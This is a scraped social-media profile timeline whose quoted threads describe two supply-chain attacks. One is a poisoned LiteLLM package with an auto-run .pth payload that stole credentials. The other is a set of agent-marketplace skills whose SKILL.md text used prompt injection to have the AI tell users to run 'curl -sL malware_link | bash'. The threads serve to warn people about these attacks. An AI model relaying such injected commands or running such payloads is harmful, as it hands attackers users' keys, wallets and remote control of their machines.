Josh Miller

124 posts

Josh Miller banner
Josh Miller

Josh Miller

@makeitmiller

Cowner of @affiliatenw & @rizz_app, winner of Time Magazine’s Invention of the Year, TM owner of the word RIZZ, bootstrapped millions in profit 🙇‍♂️

Katılım Aralık 2013
136 Takip Edilen205 Takipçiler
Josh Miller
Josh Miller@makeitmiller·
Wow 🤯
Aakash Gupta@aakashgupta

A $10 billion AI startup just got gutted because a security scanner was the entry point.. and their own developers reportedly handed production credentials to an AI chatbot. Mercor trains AI models for OpenAI, Anthropic, and Google DeepMind. They manage 30,000+ contractors, process $2 million in daily payouts, and store recorded video interviews with face and voice data used for identity verification. Three 22-year-old college dropouts built it into a decacorn in two years. The data vault they were sitting on was one of the most sensitive in the entire AI ecosystem. The attack chain is the part that gets worse every sentence. TeamPCP compromised Trivy first. A security scanning tool made by Aqua Security. On March 19. Trivy has broad read access to every environment it scans by design, because that's how vulnerability scanners work. The credentials stolen from the security product were used to hijack LiteLLM, the open-source proxy that routes API calls to every major LLM provider. LiteLLM gets 3.4 million downloads per day. The poisoned version was uploaded straight to PyPI with no corresponding GitHub release, no tag, no review. Version 1.82.8 embedded the payload in a .pth file, which Python executes automatically at startup. You didn't need to import LiteLLM. You didn't need to call it. The malware fired the second Python opened. Three stages. Harvest every SSH key, cloud token, Kubernetes secret, crypto wallet, and .env file on the machine. Deploy privileged containers across every node in the cluster. Install a persistent backdoor waiting for instructions. The stolen data was encrypted with a hardcoded 4096-bit RSA key and exfiltrated to models.litellm[.]cloud, a domain built to look legitimate. Mercor was downstream. Reports indicate their developers gave production credentials to Claude, an AI coding assistant, which was running with unrestricted system permissions. The compromised LiteLLM package came in through that pipeline. One poisoned dependency turned a $10 billion company's entire infrastructure into a credential harvesting operation. The haul: 939GB of source code. 211GB of database records containing resumes and personal data. 3TB of stored files including video interviews, face scans, and KYC documents. Full access to their TailScale VPN. 4TB total. Lapsus$ is now auctioning it with a "make an offer" price tag. The video interviews are the part that can never be undone. Faces and voices used for identity verification can generate deepfakes. Unlike passwords, biometrics cannot be reset. Thousands of doctors, lawyers, and engineers who signed up to train AI models just had their identities permanently compromised. Every AI company shipping fast right now has the same dependency chain underneath it. Nobody chose to install LiteLLM on that developer's machine. It came in as a dependency of a dependency of a tool they didn't even know they had.

QST
0
0
0
213
Josh Miller retweetledi
Boris Cherny
Boris Cherny@bcherny·
I wanted to share a bunch of my favorite hidden and under-utilized features in Claude Code. I'll focus on the ones I use the most. Here goes.
English
553
2.5K
23.2K
3.9M
Josh Miller retweetledi
sush
sush@2sush·
everyone got a camera, not everyone became a photographer. same with AI, tools are easy but skill is not
English
206
299
2.3K
92.3K
Josh Miller retweetledi
Mark Manson
Mark Manson@Markmanson·
Happiness is having better problems. Success is having better failures. Discipline is having better addictions.
English
102
276
1.9K
53.5K
Josh Miller
Josh Miller@makeitmiller·
Food delivery via AI! 🤍🚀 Goal is to have it plan and order my meals. Figure it’ll save 30+ minutes a day or 200 hours a year 🛳️ Hooked it up to an Android phone and gave it a phone number and credit card. Mind blown 🤯
Josh Miller tweet mediaJosh Miller tweet media
English
0
1
4
289
Josh Miller
Josh Miller@makeitmiller·
@OpenMotus @kybernesis @claudeai Food delivery via Kyberbot AI! 🤍🚀 Goal is to have it plan and order my meals. Figure it’ll save 30+ minutes a day or 200 hours a year 🛳️ Hooked up my Mac Mini to an Android phone and gave it a phone number and credit card. Mind blown! 🤯
Josh Miller tweet mediaJosh Miller tweet media
English
1
2
5
159
Ian Borders
Ian Borders@OpenMotus·
Running on the Claude Code harness enhanced by the @kybernesis Stateless Agent Neural Graph. @claudeai is already an exceptional AI agent. It just lacks persistent memory, self-evolving identity, and the ability to build it's own tools. kybernesis.ai/kyberbot
English
3
4
6
630
Josh Miller
Josh Miller@makeitmiller·
Social engineering was the biggest hack risk to careful businesses. This tech opens a whole new attack vector and 1000x that risk. We’re gonna see massive hacks of big enterprise this year.
chiefofautism@chiefofautism

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

English
1
0
0
193
Josh Miller
Josh Miller@makeitmiller·
I prefer terminator humans over terminator lobsters 🦞
Català
0
0
0
101
@levelsio
@levelsio@levelsio·
FINALLY WE GOT ACCEPTED!!!!!! TOOK SO LONG
@levelsio tweet media
English
130
23
1.8K
391.8K